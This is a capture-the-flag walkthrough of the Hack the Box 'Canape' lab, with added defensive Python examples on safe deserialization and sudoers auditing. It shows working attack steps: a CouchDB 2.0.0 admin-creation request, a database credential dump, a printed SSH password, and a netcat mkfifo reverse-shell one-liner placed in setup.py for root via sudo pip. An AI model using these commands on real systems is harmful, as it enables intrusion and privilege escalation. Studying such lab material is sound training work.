Hack the Box Challenge: Canape Walkthrough
Hello friends!! Today we are going to solve another CTF challenge, "Canape", which is available online for those who want to improve their skills in penetration testing and black-box testing. Canape is a retired vulnerable lab presented by Hack the Box for online penetration-testing practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are available online, they have static IPs; the IP of Canape is 10.10.10.70, so let's begin with nmap port enumeration.

    nmap -p- -sV 10.10.10.70
From the image below, you can observe that ports 80 and 65535 are open on the target system.
As port 80 is running an HTTP server, we open the target machine's IP address in our browser and find that it is a fan site for the Simpsons.
We don't find anything on the webpage, so we run a dirb scan to enumerate directories. The target machine responded with 200 OK for every request, but for /.git/HEAD the size of the response changed.

    dirb http://10.10.10.70 -f
We open the /.git/ directory and find the config file.
When we open the config file, we find a domain name, "git.canape.htb".
We add this domain name to our /etc/hosts file so that the target can be reached by hostname as well as by IP address.
Now we can clone the repository using the following command:

    git clone http://git.canape.htb/simpsons.git
Here we find a file named "__init__.py" in the simpsons folder, as shown in the image.
After downloading the files, we open "__init__.py" and find that this program is likely vulnerable to insecure deserialization, as it calls "cPickle.loads(data)" on user-supplied input.
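To make the root cause concrete from the defender's side, here is an added example (not code from the original post or from the Canape application) showing the risky pattern next to two hardened alternatives in Python 3: a data-only JSON format with explicit validation, and, where the pickle format cannot be dropped, a restricted unpickler that refuses every global lookup so no importable callable can be reached during load. The field names, allowed characters and sample records are constructed for illustration.

```python
import io
import json
import pickle

# Constructed schema for the kind of "character quote" record a fan site might accept.
# These names are assumptions; the original __init__.py is not reproduced here.
ALLOWED_FIELDS = {"character": str, "quote": str}
ALLOWED_CHARACTERS = {"homer", "marge", "bart", "lisa", "maggie"}
MAX_QUOTE_LEN = 500


def vulnerable_load(data: bytes):
    """The risky pattern: unpickling attacker-supplied bytes.
    pickle can reconstruct any importable callable and invoke it during load,
    so this amounts to code execution for whoever controls `data`."""
    return pickle.loads(data)


def safe_load_json(data: bytes) -> dict:
    """Hardened replacement: a data-only format plus explicit field validation."""
    try:
        obj = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        raise ValueError(f"malformed submission: {exc}") from None
    if not isinstance(obj, dict) or set(obj) != set(ALLOWED_FIELDS):
        raise ValueError("unexpected fields")
    for key, typ in ALLOWED_FIELDS.items():
        if not isinstance(obj[key], typ):
            raise ValueError(f"{key} has wrong type")
    if obj["character"].lower() not in ALLOWED_CHARACTERS:
        raise ValueError("unknown character")
    if len(obj["quote"]) > MAX_QUOTE_LEN:
        raise ValueError("quote too long")
    return obj


class RestrictedUnpickler(pickle.Unpickler):
    """Fallback when the pickle format must stay: refuse every global lookup,
    so only plain containers, strings and numbers can be reconstructed."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def sample_benign_pickle() -> bytes:
    """Constructed input: a plain dict, which needs no global lookups."""
    return pickle.dumps({"character": "homer", "quote": "D'oh!"})


def sample_global_pickle() -> bytes:
    """Constructed input: a pickle that references an importable global.
    The harmless builtin `len` is used here; the restricted loader rejects
    any such reference before anything is reconstructed."""
    return pickle.dumps(len)


def is_rejected(loader, data: bytes) -> bool:
    """True if the given loader refuses the input instead of returning an object."""
    try:
        loader(data)
    except (ValueError, pickle.UnpicklingError):
        return True
    return False


if __name__ == "__main__":
    print(restricted_loads(sample_benign_pickle()))
    print("global pickle rejected:", is_rejected(restricted_loads, sample_global_pickle()))
    print(safe_load_json(b'{"character": "Homer", "quote": "Mmm... donuts"}'))
    print("bad json rejected:", is_rejected(safe_load_json, b'{"character": "burns", "quote": "x"}'))
```

The JSON path is the right fix for a web form: the parser can only ever produce dicts, lists, strings and numbers, and the validation layer decides what is acceptable. The restricted unpickler is a mitigation for legacy callers that still exchange pickles, and it should be paired with a plan to migrate away from pickle entirely.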
Now we create a program to exploit this vulnerability and get a reverse shell. You can download the exploit from here.
We set up our netcat listener before running the program, using the following command:

    nc -lvp 443
After getting the reverse shell, we continue enumerating. We check for ports on the target machine that are listening locally and find a service running on port 5984, which is Apache CouchDB.

    netstat -antp

Apache CouchDB is an open-source database. We check the CouchDB version and list all databases using the following commands:

    curl http://127.0.0.1:5984
    curl http://127.0.0.1:5984/_all_dbs
From the above output, we find the CouchDB version to be "2.0.0". This version of CouchDB is vulnerable to remote privilege escalation. You can find more about this vulnerability here.
We then create a user with permission to read the database using the following command (the document ID must use the org.couchdb.user: prefix):

    curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:hack' --data-binary '{ "type": "user", "name": "hack", "roles": ["_admin"], "roles": [], "password": "password" }'
We then dump the database with the following command:

    curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u hack:password

The above command dumps the passwords database, where we find the password used for SSH login. Now all we need is the username.
We open /etc/passwd to list the users on the target machine and find that there is only one regular user, homer.

    cat /etc/passwd
We log in through SSH (on port 65535) using the credentials we found earlier, "homer:0B4jyA0xtytZi7esBNGp". After logging in we find a file, "user.txt". We open the file and find our first flag.
After getting the flag, we check the sudoers list and find that homer has permission to run "pip install *" as the root user.

    ssh homer@10.10.10.70 -p65535
    ls
    cat user.txt
    sudo -l
Now, since we can run "pip install *" as root, we abuse it by writing a reverse shell into a file named "setup.py", which pip executes during installation.
We use the netcat pipe one-liner to get the reverse shell:

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f

Now we can trigger our reverse shell using the following command:

    sudo pip install .

Remember to set up the listener before running the above command.
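The sudo rule above is the real lesson for administrators: pip runs a package's setup.py as the invoking user, so "pip install *" as root is equivalent to granting a root shell. Below is an added example (not part of the original post, and not a tool the lab provides) that audits sudoers-style rules for this class of mistake. The sudoers content is constructed for illustration; the list of code-executing binaries is an assumption you would extend for your own environment.

```python
import os
import re

# Constructed sample sudoers content (not the lab's real /etc/sudoers).
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
homer ALL=(root) NOPASSWD: /usr/bin/pip install *
marge ALL=(root) /usr/sbin/service apache2 restart
bart ALL=(ALL) NOPASSWD: /usr/bin/python3 *
"""

# Binaries that execute caller-controlled code as part of normal operation
# (pip runs setup.py, interpreters run whatever script they are handed).
# Assumed starting list; extend for your environment.
CODE_RUNNERS = {
    "pip", "pip2", "pip3", "python", "python2", "python3",
    "perl", "ruby", "gem", "npm", "node",
}

# user host=(runas) [TAG: ...] command [args]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_rules(text: str) -> list:
    """Return one dict per user-specification line; Defaults/comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rule = m.groupdict()
        rule["tags"] = [t.strip(": ") for t in rule["tags"].split(":") if t.strip()]
        rule["cmd"] = rule["cmd"].strip()
        rules.append(rule)
    return rules


def audit(text: str) -> list:
    """Flag rules that give a non-root user root-equivalent execution."""
    findings = []
    for rule in parse_rules(text):
        if rule["user"] == "root":
            continue
        cmd = rule["cmd"]
        if cmd == "ALL":
            findings.append({**rule, "reason": "unrestricted command (ALL)"})
            continue
        parts = cmd.split()
        binary = os.path.basename(parts[0])
        args = parts[1:]
        if binary in CODE_RUNNERS and any("*" in a for a in args):
            findings.append({
                **rule,
                "reason": f"wildcard argument to code-executing binary {binary}",
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        pw = "NOPASSWD" if "NOPASSWD" in f["tags"] else "password"
        print(f"{f['user']}: {f['cmd']!r} as {f['runas']} ({pw}) -> {f['reason']}")
```

The remediation for a flagged rule is not to tighten the wildcard but to remove the code-running binary from sudo altogether: install packages through a controlled deployment path, or, where root-run pip is unavoidable, restrict it to exact pinned package specifications with no wildcard and no "." or path arguments.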
As soon as we run the command, we get our reverse shell as the root user. We move to the /root directory to get "root.txt", read the file, and find our final flag.

    nc -lvp 4444
    id
    cd /root
    ls
    cat root.txt
Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here
Source: www.hackingarticles.in